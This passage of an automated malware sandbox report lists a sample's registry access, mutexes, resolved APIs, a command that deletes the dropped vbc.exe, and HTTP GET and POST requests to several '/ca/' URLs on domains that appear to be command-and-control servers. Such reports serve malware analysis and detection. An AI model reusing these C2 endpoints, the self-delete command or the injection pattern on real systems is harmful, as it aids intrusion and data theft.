Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\NewUserDefaultConsent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\BEX64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LoggingDisabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontShowUI HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableArchive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ConfigureArchive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableQueue 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxQueueCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceQueue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\SendEFSFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\BEX64 HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LoggingDisabled HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontShowUI HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableArchive HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ConfigureArchive HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableQueue HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxQueueCount HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceQueue HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\SendEFSFiles HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling 
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerServer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseSSL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerPortNumber HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseAuthentication HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC\RacWerSampleTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\BIOSVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\taskhost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\SYSTEM32\ntdll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\kernel32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\KERNELBASE.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\msvcrt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\ole32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\GDI32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\USER32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\LPK.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\USP10.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\RPCRT4.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\OLEAUT32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\IMM32.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\MSCTF.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\ADVAPI32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\SYSTEM32\sechost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\SspiCli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\CRYPTBASE.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\CLBCatQ.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\RacEngn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\AEPIC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\VERSION.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\6FD5A890
Write Keys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type
- HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent
- HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
Delete Keys
Nothing to display
Mutexes
- ebKgurUj
- Local\_!MSFTHISTORY!_
- Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5!
- Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies!
- Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5!
- Local\WERReportingForProcess2384
- Global\\xe5\x88\x90Q
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW clr.dll.SetRuntimeInfo clr.dll._CorExeMain mscoree.dll.CreateConfigStream mscoreei.dll.CreateConfigStream kernel32.dll.GetNumaHighestNodeNumber kernel32.dll.GetSystemWindowsDirectoryW advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddSIDToBoundaryDescriptor kernel32.dll.CreateBoundaryDescriptorW kernel32.dll.CreatePrivateNamespaceW kernel32.dll.OpenPrivateNamespaceW kernel32.dll.DeleteBoundaryDescriptor kernel32.dll.WerRegisterRuntimeExceptionModule kernel32.dll.RaiseException 
mscoree.dll.#24 mscoreei.dll.#24 ntdll.dll.NtSetSystemInformation kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 clrjit.dll.sxsJitStartup clrjit.dll.getJit kernel32.dll.ReleaseMutex kernel32.dll.CreateMutexW kernel32.dll.CloseHandle kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetUserPreferredUILanguages shell32.dll.SHGetFolderPathW ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree kernel32.dll.GetFullPathNameW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap kernel32.dll.SetThreadErrorMode kernel32.dll.GetFileAttributesExW kernel32.dll.CompareStringOrdinal clr.dll.CreateAssemblyNameObject ole32.dll.CoGetContextToken ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint clr.dll.CreateAssemblyEnum kernel32.dll.ResolveLocaleName kernel32.dll.LoadLibraryA kernel32.dll.WideCharToMultiByte kernel32.dll.GetProcAddress kernel32.dll.GetModuleHandleA advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges ntdll.dll.NtQuerySystemInformation kernel32.dll.CreateProcessA kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx kernel32.dll.ResumeThread advapi32.dll.EventUnregister ole32.dll.CoUninitialize oleaut32.dll.#500 
kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx kernel32.dll.QueryActCtxW cryptsp.dll.CryptReleaseContext uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware mlang.dll.#112 wininet.dll.FindFirstUrlCacheEntryA kernel32.dll.SetFileInformationByHandle urlmon.dll.CreateUri kernel32.dll.InitializeSRWLock kernel32.dll.AcquireSRWLockExclusive kernel32.dll.AcquireSRWLockShared kernel32.dll.ReleaseSRWLockExclusive kernel32.dll.ReleaseSRWLockShared wininet.dll.FindNextUrlCacheEntryA wininet.dll.FindCloseUrlCache kernel32.dll.IsProcessorFeaturePresent user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayMonitors user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC windowscodecs.dll.DllGetClassObject kernel32.dll.WerRegisterMemoryBlock oleaut32.dll.#8 oleaut32.dll.#9 oleaut32.dll.#10 kernel32.dll.SetThreadUILanguage kernel32.dll.CopyFileExW kernel32.dll.IsDebuggerPresent kernel32.dll.SetConsoleInputExeNameW dwmapi.dll.DwmIsCompositionEnabled rpcrt4.dll.UuidFromStringW radarrs.dll.WdiDiagnosticModuleMain radarrs.dll.WdiHandleInstance radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion wersvc.dll.ServiceMain wersvc.dll.SvchostPushServiceGlobals advapi32.dll.RegGetValueW sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW faultrep.dll.WerpInitiateCrashReporting wer.dll.WerpCreateMachineStore shell32.dll.SHGetFolderPathEx ole32.dll.StringFromGUID2 profapi.dll.#104 userenv.dll.CreateEnvironmentBlock sechost.dll.ConvertSidToStringSidW sspicli.dll.GetUserNameExW userenv.dll.DestroyEnvironmentBlock wer.dll.WerpSvcReportFromMachineQueue advapi32.dll.DuplicateToken advapi32.dll.CheckTokenMembership wtsapi32.dll.WTSQueryUserToken winsta.dll.WinStationQueryInformationW advapi32.dll.CreateWellKnownSid rpcrt4.dll.RpcStringBindingComposeW rpcrt4.dll.RpcBindingFromStringBindingW 
rpcrt4.dll.RpcStringFreeW rpcrt4.dll.RpcBindingSetAuthInfoExW rpcrt4.dll.NdrClientCall3 rpcrt4.dll.RpcBindingFree advapi32.dll.ImpersonateLoggedOnUser advapi32.dll.CreateProcessAsUserW imm32.dll.ImmDisableIME psapi.dll.GetModuleFileNameExW wer.dll.WerpCreateIntegratorReportId wer.dll.WerReportCreate wer.dll.WerpSetIntegratorReportId wer.dll.WerReportSetParameter dbgeng.dll.DebugCreate ntdll.dll.CsrGetProcessId ntdll.dll.DbgBreakPoint ntdll.dll.DbgPrint ntdll.dll.DbgPrompt ntdll.dll.DbgUiConvertStateChangeStructure ntdll.dll.DbgUiGetThreadDebugObject ntdll.dll.DbgUiIssueRemoteBreakin ntdll.dll.DbgUiSetThreadDebugObject ntdll.dll.NtAllocateVirtualMemory ntdll.dll.NtClose ntdll.dll.NtCreateDebugObject ntdll.dll.NtCreateFile ntdll.dll.NtDebugActiveProcess ntdll.dll.NtDebugContinue ntdll.dll.NtFreeVirtualMemory ntdll.dll.NtOpenProcess ntdll.dll.NtOpenThread ntdll.dll.NtQueryInformationProcess ntdll.dll.NtQueryInformationThread ntdll.dll.NtQueryMutant ntdll.dll.NtQueryObject ntdll.dll.NtRemoveProcessDebug ntdll.dll.NtResumeThread ntdll.dll.NtSetInformationDebugObject ntdll.dll.NtSetInformationProcess ntdll.dll.NtSystemDebugControl ntdll.dll.NtWaitForDebugEvent ntdll.dll.RtlAnsiStringToUnicodeString ntdll.dll.RtlCreateProcessParameters ntdll.dll.RtlCreateUserProcess ntdll.dll.RtlDestroyProcessParameters ntdll.dll.RtlDosPathNameToNtPathName_U ntdll.dll.RtlFindMessage ntdll.dll.RtlFreeHeap ntdll.dll.RtlFreeUnicodeString ntdll.dll.RtlGetFunctionTableListHead ntdll.dll.RtlGetUnloadEventTrace ntdll.dll.RtlGetUnloadEventTraceEx ntdll.dll.RtlInitAnsiString ntdll.dll.RtlInitUnicodeString ntdll.dll.RtlTryEnterCriticalSection ntdll.dll.RtlUnicodeStringToAnsiString ntdll.dll.NtOpenProcessToken ntdll.dll.NtOpenThreadToken ntdll.dll.NtQueryInformationToken kernel32.dll.CloseProfileUserMapping kernel32.dll.CreateToolhelp32Snapshot kernel32.dll.DebugActiveProcessStop kernel32.dll.DebugBreak kernel32.dll.DebugBreakProcess kernel32.dll.DebugSetProcessKillOnExit kernel32.dll.Module32First 
kernel32.dll.Module32FirstW kernel32.dll.Module32Next kernel32.dll.Module32NextW kernel32.dll.OpenThread kernel32.dll.Process32First kernel32.dll.Process32FirstW kernel32.dll.Process32Next kernel32.dll.Process32NextW kernel32.dll.ProcessIdToSessionId kernel32.dll.SetProcessShutdownParameters kernel32.dll.Thread32First kernel32.dll.Thread32Next kernel32.dll.GetTimeZoneInformation kernel32.dll.DuplicateHandle kernel32.dll.Wow64GetThreadSelectorEntry advapi32.dll.CloseServiceHandle advapi32.dll.ControlService advapi32.dll.CreateServiceA advapi32.dll.CreateServiceW advapi32.dll.DeleteService advapi32.dll.EnumServicesStatusExA advapi32.dll.EnumServicesStatusExW advapi32.dll.GetEventLogInformation advapi32.dll.OpenSCManagerA advapi32.dll.OpenSCManagerW advapi32.dll.OpenServiceA advapi32.dll.OpenServiceW advapi32.dll.StartServiceA advapi32.dll.StartServiceW advapi32.dll.GetSidSubAuthority advapi32.dll.GetSidSubAuthorityCount version.dll.GetFileVersionInfoSizeExW version.dll.GetFileVersionInfoExW dbghelp.dll.WinDbgExtensionDllInit dbghelp.dll.ExtensionApiVersion wer.dll.WerpSetDynamicParameter wer.dll.WerReportAddDump wer.dll.WerpSetCallBack wer.dll.WerReportSetUIOption wer.dll.WerpAddRegisteredDataToReport wer.dll.WerReportSubmit user32.dll.LoadStringW advapi32.dll.RegCreateKeyExW advapi32.dll.RegSetValueExW sensapi.dll.IsNetworkAlive user32.dll.CharUpperW wer.dll.WerpAddAppCompatData apphelp.dll.SdbGetFileAttributes apphelp.dll.SdbFormatAttribute apphelp.dll.SdbFreeFileAttributes cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash dbghelp.dll.MiniDumpWriteDump kernel32.dll.GetLongPathNameA kernel32.dll.GetLongPathNameW kernel32.dll.GetProcessTimes advapi32.dll.RegOpenKeyExA advapi32.dll.RegQueryValueExA powrprof.dll.CallNtPowerInformation psapi.dll.EnumProcessModules version.dll.GetFileVersionInfoSizeA version.dll.GetFileVersionInfoA version.dll.VerQueryValueA verifier.dll.VerifierEnumerateResource 
ntdll.dll.NtSuspendProcess ntdll.dll.NtResumeProcess advapi32.dll.QueryTraceW advapi32.dll.IsValidSid advapi32.dll.GetLengthSid advapi32.dll.CopySid advapi32.dll.AddAccessAllowedAceEx advapi32.dll.InitializeSecurityDescriptor advapi32.dll.SetSecurityDescriptorDacl advapi32.dll.RegisterEventSourceW advapi32.dll.ReportEventW advapi32.dll.DeregisterEventSource wer.dll.WerpGetStoreLocation wer.dll.WerpGetStoreType
Execute Commands
- "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
- C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
- C:\Windows\system32\lsass.exe
- taskhost.exe $(Arg0)
- C:\Windows\System32\svchost.exe -k WerSvcGroup
- C:\Windows\system32\WerFault.exe -u -p 2384 -s 292
Started Services
- VaultSvc
- WerSvc
Created Services
Nothing to display
13 HTTP Request(s) detected
http://www.glowsole.com/ca/?8pgTVpAp=kA6gmZ5EWLoc3k3LepBIjgUX/v60aq6scZPph6z89XUxJ6XCAsys1W5b+p4aSJBn2pC8+Pgm&Bj=lHU80vox_T4h
- Hostname: www.glowsole.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=kA6gmZ5EWLoc3k3LepBIjgUX/v60aq6scZPph6z89XUxJ6XCAsys1W5b+p4aSJBn2pC8+Pgm&Bj=lHU80vox_T4h HTTP/1.1 Host: www.glowsole.com Connection: close
http://www.classicrockandgems.com/ca/?8pgTVpAp=mCOHzPdu+fAGyzf1IeqFEZ+iBma2k3gF8M3pIM6w8KkZAJQpYbIqp1d8U9j4Hw7I07TASQAS&Bj=lHU80vox_T4h
- Hostname: www.classicrockandgems.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=mCOHzPdu+fAGyzf1IeqFEZ+iBma2k3gF8M3pIM6w8KkZAJQpYbIqp1d8U9j4Hw7I07TASQAS&Bj=lHU80vox_T4h HTTP/1.1 Host: www.classicrockandgems.com Connection: close
http://www.classicrockandgems.com/ca/
- Hostname: www.classicrockandgems.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.classicrockandgems.com Connection: close Content-Length: 2202 Cache-Control: no-cache Origin: http://www.classicrockandgems.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.classicrockandgems.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.classicrockandgems.com/ca/
- Hostname: www.classicrockandgems.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.classicrockandgems.com Connection: close Content-Length: 57310 Cache-Control: no-cache Origin: http://www.classicrockandgems.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.classicrockandgems.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.spoiledheart.com/ca/?8pgTVpAp=3qiCbzHjUKrx5316i0hNMiDY24i5CSmBAhzJOumdUxAosQrDJicuf8DALk31WhWtOjX/d2E1&Bj=lHU80vox_T4h
- Hostname: www.spoiledheart.com
- IP Address: 192.254.190.199
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=3qiCbzHjUKrx5316i0hNMiDY24i5CSmBAhzJOumdUxAosQrDJicuf8DALk31WhWtOjX/d2E1&Bj=lHU80vox_T4h HTTP/1.1 Host: www.spoiledheart.com Connection: close
http://www.spoiledheart.com/ca/
- Hostname: www.spoiledheart.com
- IP Address: 192.254.190.199
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.spoiledheart.com Connection: close Content-Length: 2202 Cache-Control: no-cache Origin: http://www.spoiledheart.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.spoiledheart.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.spoiledheart.com/ca/
- Hostname: www.spoiledheart.com
- IP Address: 192.254.190.199
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.spoiledheart.com Connection: close Content-Length: 57310 Cache-Control: no-cache Origin: http://www.spoiledheart.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.spoiledheart.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.367vision.com/ca/?8pgTVpAp=qje6eop49qX+GGoPGoorvc415RPYGJiQbBRMscic/vwCUvhv1kHn9liljdiNV+DId7TFJDBe&Bj=lHU80vox_T4h
- Hostname: www.367vision.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=qje6eop49qX+GGoPGoorvc415RPYGJiQbBRMscic/vwCUvhv1kHn9liljdiNV+DId7TFJDBe&Bj=lHU80vox_T4h HTTP/1.1 Host: www.367vision.com Connection: close
http://www.367vision.com/ca/
- Hostname: www.367vision.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.367vision.com Connection: close Content-Length: 2202 Cache-Control: no-cache Origin: http://www.367vision.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.367vision.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.367vision.com/ca/
- Hostname: www.367vision.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.367vision.com Connection: close Content-Length: 57310 Cache-Control: no-cache Origin: http://www.367vision.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.367vision.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.jcygtpu.com/ca/?8pgTVpAp=o3AtFaTs1rmGXcR0wgItQmgbfTY+urSXwC3w6Z/iYvvKaJ7Bo/+NxMYDAwHpQL/BoezhCD4D&Bj=lHU80vox_T4h
- Hostname: www.jcygtpu.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=o3AtFaTs1rmGXcR0wgItQmgbfTY+urSXwC3w6Z/iYvvKaJ7Bo/+NxMYDAwHpQL/BoezhCD4D&Bj=lHU80vox_T4h HTTP/1.1 Host: www.jcygtpu.com Connection: close
http://www.jcygtpu.com/ca/
- Hostname: www.jcygtpu.com
- IP Address:
- Port: 80
- Count: 1
